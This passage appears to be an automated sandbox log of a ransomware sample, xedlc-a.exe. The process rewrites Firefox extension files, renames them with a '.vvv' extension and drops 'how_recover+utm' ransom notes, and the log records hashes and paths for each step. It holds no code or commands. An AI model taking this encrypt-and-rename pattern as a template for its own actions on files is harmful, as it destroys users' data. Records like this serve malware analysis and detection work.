54254.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54255.            ads:
54256.          fid (ads:): 562949953476261
54257.          ntstatus: 0x0
54258.          CreateOptions: 0x60
54259.        file:
54260.          timestamp: 80941
54261.          mode: close
54262.          sequenceNumber: 1252
54263.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
54264.          filesize: 2542
54265.          md5sum: 260150047a5e74b5848dbbeda974df89
54266.          sha1sum: 3f37564059ac70204d56b75b9f2daaf28cd9bac6
54267.          processinfo:
54268.            pid: 1056
54269.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54270.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54271.            ads:
54272.          fid (ads:): 562949953476261
54273.          ntstatus: 0x0
54274.          CreateOptions: 0x0
54275.        file:
54276.          timestamp: 80953
54277.          mode: rename
54278.          sequenceNumber: 1253
54279.          filesize: 2542
54280.          md5sum: 260150047a5e74b5848dbbeda974df89
54281.          sha1sum: 3f37564059ac70204d56b75b9f2daaf28cd9bac6
54282.          processinfo:
54283.            pid: 1056
54284.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54286.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js
54287.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\events.js.vvv
54288.            ads:
54289.          fid (ads:): 562949953476261
54290.          ntstatus: 0x0
54291.          CreateOptions: 0x0
54292.        file:
54293.          timestamp: 80965
54294.          mode: open
54295.          sequenceNumber: 1254
54296.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
54297.          filesize: 4982
54298.          processinfo:
54299.            pid: 1056
54300.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54301.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54302.            ads:
54303.          fid (ads:): 281474976765900
54304.          ntstatus: 0x0
54305.          CreateOptions: 0x60
54306.        file:
54307.          timestamp: 81190
54308.          mode: close
54309.          sequenceNumber: 1255
54310.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
54311.          filesize: 5406
54312.          md5sum: 5045d24f83ce91fbc02b49fd0afcd56c
54313.          sha1sum: e18722d2cb51ea432fa561100060599716b04d99
54314.          processinfo:
54315.            pid: 1056
54316.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54317.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54318.            ads:
54319.          fid (ads:): 281474976765900
54320.          ntstatus: 0x0
54321.          CreateOptions: 0x0
54322.        file:
54323.          timestamp: 81203
54324.          mode: rename
54325.          sequenceNumber: 1256
54326.          filesize: 5406
54327.          md5sum: 5045d24f83ce91fbc02b49fd0afcd56c
54328.          sha1sum: e18722d2cb51ea432fa561100060599716b04d99
54329.          processinfo:
54330.            pid: 1056
54331.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54332.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54333.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js
54334.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\observer.js.vvv
54335.            ads:
54336.          fid (ads:): 281474976765900
54337.          ntstatus: 0x0
54338.          CreateOptions: 0x0
54339.        file:
54340.          timestamp: 81227
54341.          mode: open
54342.          sequenceNumber: 1257
54343.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
54344.          filesize: 9861
54345.          processinfo:
54346.            pid: 1056
54347.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54348.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54349.            ads:
54350.          fid (ads:): 562949953476266
54351.          ntstatus: 0x0
54352.          CreateOptions: 0x60
54353.        file:
54354.          timestamp: 81393
54355.          mode: close
54356.          sequenceNumber: 1258
54357.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
54358.          filesize: 10286
54359.          md5sum: 988f070a9b488f7bda7a1f8e4f1dd9d6
54360.          sha1sum: ef6194e3ee2f95b1b9a40acc452cc4d8e2deaa71
54361.          processinfo:
54362.            pid: 1056
54363.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54364.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54365.            ads:
54366.          fid (ads:): 562949953476266
54367.          ntstatus: 0x0
54368.          CreateOptions: 0x0
54369.        file:
54370.          timestamp: 81469
54371.          mode: rename
54372.          sequenceNumber: 1259
54373.          filesize: 10286
54374.          md5sum: 988f070a9b488f7bda7a1f8e4f1dd9d6
54375.          sha1sum: ef6194e3ee2f95b1b9a40acc452cc4d8e2deaa71
54376.          processinfo:
54377.            pid: 1056
54378.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54380.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js
54381.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\tab.js.vvv
54382.            ads:
54383.          fid (ads:): 562949953476266
54384.          ntstatus: 0x0
54385.          CreateOptions: 0x0
54386.        file:
54387.          timestamp: 81481
54388.          mode: open
54389.          sequenceNumber: 1260
54390.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
54391.          filesize: 2841
54392.          processinfo:
54393.            pid: 1056
54394.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54396.            ads:
54397.          fid (ads:): 562949953476268
54398.          ntstatus: 0x0
54399.          CreateOptions: 0x60
54400.        file:
54401.          timestamp: 81537
54402.          mode: close
54403.          sequenceNumber: 1261
54404.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
54405.          filesize: 3262
54406.          md5sum: db9517e44b9f26298875daf0d99635e4
54407.          sha1sum: 567968eed19403f256994a8b9c7f3fdd322ee9af
54408.          processinfo:
54409.            pid: 1056
54410.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54412.            ads:
54413.          fid (ads:): 562949953476268
54414.          ntstatus: 0x0
54415.          CreateOptions: 0x0
54416.        file:
54417.          timestamp: 81551
54418.          mode: rename
54419.          sequenceNumber: 1262
54420.          filesize: 3262
54421.          md5sum: db9517e44b9f26298875daf0d99635e4
54422.          sha1sum: 567968eed19403f256994a8b9c7f3fdd322ee9af
54423.          processinfo:
54424.            pid: 1056
54425.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54426.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54427.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js
54428.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\utils.js.vvv
54429.            ads:
54430.          fid (ads:): 562949953476268
54431.          ntstatus: 0x0
54432.          CreateOptions: 0x0
54433.        file:
54434.          timestamp: 81562
54435.          mode: created
54436.          sequenceNumber: 1263
54437.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.txt
54438.          processinfo:
54439.            pid: 1056
54440.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54441.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54442.            ads:
54443.          fid (ads:): 281474976778349
54444.          ntstatus: 0x0
54445.          CreateOptions: 0x60
54446.        file:
54447.          timestamp: 81570
54448.          mode: close
54449.          sequenceNumber: 1264
54450.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.txt
54451.          filesize: 2682
54452.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
54453.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
54454.          processinfo:
54455.            pid: 1056
54456.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54457.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54458.            ads:
54459.          fid (ads:): 281474976778349
54460.          ntstatus: 0x0
54461.          CreateOptions: 0x0
54462.        file:
54463.          timestamp: 81579
54464.          mode: created
54465.          sequenceNumber: 1265
54466.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.html
54467.          processinfo:
54468.            pid: 1056
54469.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54471.            ads:
54472.          fid (ads:): 281474976778350
54473.          ntstatus: 0x0
54474.          CreateOptions: 0x60
54475.        file:
54476.          timestamp: 81587
54477.          mode: close
54478.          sequenceNumber: 1266
54479.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\tabs\how_recover+utm.html
54480.          filesize: 9495
54481.          md5sum: 95f596a25dff51b6af2042b1bbe02985
54482.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
54483.          processinfo:
54484.            pid: 1056
54485.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54486.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54487.            ads:
54488.          fid (ads:): 281474976778350
54489.          ntstatus: 0x0
54490.          CreateOptions: 0x0
54491.        file:
54492.          timestamp: 81597
54493.          mode: open
54494.          sequenceNumber: 1267
54495.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
54496.          filesize: 10574
54497.          processinfo:
54498.            pid: 1056
54499.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54500.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54501.            ads:
54502.          fid (ads:): 281474976765880
54503.          ntstatus: 0x0
54504.          CreateOptions: 0x60
54505.        file:
54506.          timestamp: 81654
54507.          mode: close
54508.          sequenceNumber: 1268
54509.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
54510.          filesize: 10990
54511.          md5sum: 193ce27e6b54ade6f0a8e6bee15fabc2
54512.          sha1sum: 09172afa725f5561b4a920ae743c75ee1428306b
54513.          processinfo:
54514.            pid: 1056
54515.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54516.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54517.            ads:
54518.          fid (ads:): 281474976765880
54519.          ntstatus: 0x0
54520.          CreateOptions: 0x0
54521.        file:
54522.          timestamp: 81667
54523.          mode: rename
54524.          sequenceNumber: 1269
54525.          filesize: 10990
54526.          md5sum: 193ce27e6b54ade6f0a8e6bee15fabc2
54527.          sha1sum: 09172afa725f5561b4a920ae743c75ee1428306b
54528.          processinfo:
54529.            pid: 1056
54530.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54531.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54532.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js
54533.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\assert.js.vvv
54534.            ads:
54535.          fid (ads:): 281474976765880
54536.          ntstatus: 0x0
54537.          CreateOptions: 0x0
54538.        file:
54539.          timestamp: 81679
54540.          mode: created
54541.          sequenceNumber: 1270
54542.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.txt
54543.          processinfo:
54544.            pid: 1056
54545.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54547.            ads:
54548.          fid (ads:): 281474976778351
54549.          ntstatus: 0x0
54550.          CreateOptions: 0x60
54551.        file:
54552.          timestamp: 81687
54553.          mode: close
54554.          sequenceNumber: 1271
54555.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.txt
54556.          filesize: 2682
54557.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
54558.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
54559.          processinfo:
54560.            pid: 1056
54561.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54562.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54563.            ads:
54564.          fid (ads:): 281474976778351
54565.          ntstatus: 0x0
54566.          CreateOptions: 0x0
54567.        file:
54568.          timestamp: 81697
54569.          mode: created
54570.          sequenceNumber: 1272
54571.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.html
54572.          processinfo:
54573.            pid: 1056
54574.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54576.            ads:
54577.          fid (ads:): 281474976778352
54578.          ntstatus: 0x0
54579.          CreateOptions: 0x60
54580.        file:
54581.          timestamp: 81705
54582.          mode: close
54583.          sequenceNumber: 1273
54584.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test\how_recover+utm.html
54585.          filesize: 9495
54586.          md5sum: 95f596a25dff51b6af2042b1bbe02985
54587.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
54588.          processinfo:
54589.            pid: 1056
54590.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54592.            ads:
54593.          fid (ads:): 281474976778352
54594.          ntstatus: 0x0
54595.          CreateOptions: 0x0
54596.        file:
54597.          timestamp: 81715
54598.          mode: open
54599.          sequenceNumber: 1274
54600.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
54601.          filesize: 5146
54602.          processinfo:
54603.            pid: 1056
54604.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54606.            ads:
54607.          fid (ads:): 281474976765864
54608.          ntstatus: 0x0
54609.          CreateOptions: 0x60
54610.        file:
54611.          timestamp: 81770
54612.          mode: close
54613.          sequenceNumber: 1275
54614.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
54615.          filesize: 5566
54616.          md5sum: 0e4a16cc55d06b5268b44de7c1bc2fc6
54617.          sha1sum: 6594c69821b0102979aafb5945a610eab260cadd
54618.          processinfo:
54619.            pid: 1056
54620.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54621.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54622.            ads:
54623.          fid (ads:): 281474976765864
54624.          ntstatus: 0x0
54625.          CreateOptions: 0x0
54626.        file:
54627.          timestamp: 81782
54628.          mode: rename
54629.          sequenceNumber: 1276
54630.          filesize: 5566
54631.          md5sum: 0e4a16cc55d06b5268b44de7c1bc2fc6
54632.          sha1sum: 6594c69821b0102979aafb5945a610eab260cadd
54633.          processinfo:
54634.            pid: 1056
54635.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54637.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js
54638.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\test.js.vvv
54639.            ads:
54640.          fid (ads:): 281474976765864
54641.          ntstatus: 0x0
54642.          CreateOptions: 0x0
54643.        file:
54644.          timestamp: 81794
54645.          mode: open
54646.          sequenceNumber: 1277
54647.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
54648.          filesize: 9490
54649.          processinfo:
54650.            pid: 1056
54651.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54652.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54653.            ads:
54654.          fid (ads:): 562949953476247
54655.          ntstatus: 0x0
54656.          CreateOptions: 0x60
54657.        file:
54658.          timestamp: 81849
54659.          mode: close
54660.          sequenceNumber: 1278
54661.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
54662.          filesize: 9918
54663.          md5sum: d1701edd15aa2e3c2170e8a9e3e62829
54664.          sha1sum: d4346b8d33bf9e8384c80ac541a6b1ac2b156b1a
54665.          processinfo:
54666.            pid: 1056
54667.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54668.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54669.            ads:
54670.          fid (ads:): 562949953476247
54671.          ntstatus: 0x0
54672.          CreateOptions: 0x0
54673.        file:
54674.          timestamp: 81861
54675.          mode: rename
54676.          sequenceNumber: 1279
54677.          filesize: 9918
54678.          md5sum: d1701edd15aa2e3c2170e8a9e3e62829
54679.          sha1sum: d4346b8d33bf9e8384c80ac541a6b1ac2b156b1a
54680.          processinfo:
54681.            pid: 1056
54682.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54683.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54684.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js
54685.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\text-streams.js.vvv
54686.            ads:
54687.          fid (ads:): 562949953476247
54688.          ntstatus: 0x0
54689.          CreateOptions: 0x0
54690.        file:
54691.          timestamp: 81872
54692.          mode: open
54693.          sequenceNumber: 1280
54694.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
54695.          filesize: 2658
54696.          processinfo:
54697.            pid: 1056
54698.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54700.            ads:
54701.          fid (ads:): 562949953476255
54702.          ntstatus: 0x0
54703.          CreateOptions: 0x60
54704.        file:
54705.          timestamp: 81882
54706.          mode: close
54707.          sequenceNumber: 1281
54708.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
54709.          filesize: 3086
54710.          md5sum: 89a90889b5032f55968c56730cd28b0c
54711.          sha1sum: d4cfea285df373ceb93680b490aba9861e6124d2
54712.          processinfo:
54713.            pid: 1056
54714.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54716.            ads:
54717.          fid (ads:): 562949953476255
54718.          ntstatus: 0x0
54719.          CreateOptions: 0x0
54720.        file:
54721.          timestamp: 81895
54722.          mode: rename
54723.          sequenceNumber: 1282
54724.          filesize: 3086
54725.          md5sum: 89a90889b5032f55968c56730cd28b0c
54726.          sha1sum: d4cfea285df373ceb93680b490aba9861e6124d2
54727.          processinfo:
54728.            pid: 1056
54729.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54731.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js
54732.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer-e10s-adapter.js.vvv
54733.            ads:
54734.          fid (ads:): 562949953476255
54735.          ntstatus: 0x0
54736.          CreateOptions: 0x0
54737.        file:
54738.          timestamp: 81906
54739.          mode: open
54740.          sequenceNumber: 1283
54741.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
54742.          filesize: 4208
54743.          processinfo:
54744.            pid: 1056
54745.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54746.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54747.            ads:
54748.          fid (ads:): 281474976765853
54749.          ntstatus: 0x0
54750.          CreateOptions: 0x60
54751.        file:
54752.          timestamp: 81978
54753.          mode: close
54754.          sequenceNumber: 1284
54755.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
54756.          filesize: 4638
54757.          md5sum: 0a30fdb7bca6d4608fb55372eec381d8
54758.          sha1sum: e60e513ffa403e29527b9e04742ba2561fdd35e5
54759.          processinfo:
54760.            pid: 1056
54761.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54762.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54763.            ads:
54764.          fid (ads:): 281474976765853
54765.          ntstatus: 0x0
54766.          CreateOptions: 0x0
54767.        file:
54768.          timestamp: 81991
54769.          mode: rename
54770.          sequenceNumber: 1285
54771.          filesize: 4638
54772.          md5sum: 0a30fdb7bca6d4608fb55372eec381d8
54773.          sha1sum: e60e513ffa403e29527b9e04742ba2561fdd35e5
54774.          processinfo:
54775.            pid: 1056
54776.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54777.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54778.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js
54779.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\timer.js.vvv
54780.            ads:
54781.          fid (ads:): 281474976765853
54782.          ntstatus: 0x0
54783.          CreateOptions: 0x0
54784.        file:
54785.          timestamp: 82214
54786.          mode: open
54787.          sequenceNumber: 1286
54788.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
54789.          filesize: 5081
54790.          processinfo:
54791.            pid: 1056
54792.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54794.            ads:
54795.          fid (ads:): 281474976765891
54796.          ntstatus: 0x0
54797.          CreateOptions: 0x60
54798.        file:
54799.          timestamp: 82316
54800.          mode: close
54801.          sequenceNumber: 1287
54802.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
54803.          filesize: 5502
54804.          md5sum: f56a220df36eef77f824f0c858720f02
54805.          sha1sum: 22598e075a61f0d25d876fec777a00d6d4efa6c3
54806.          processinfo:
54807.            pid: 1056
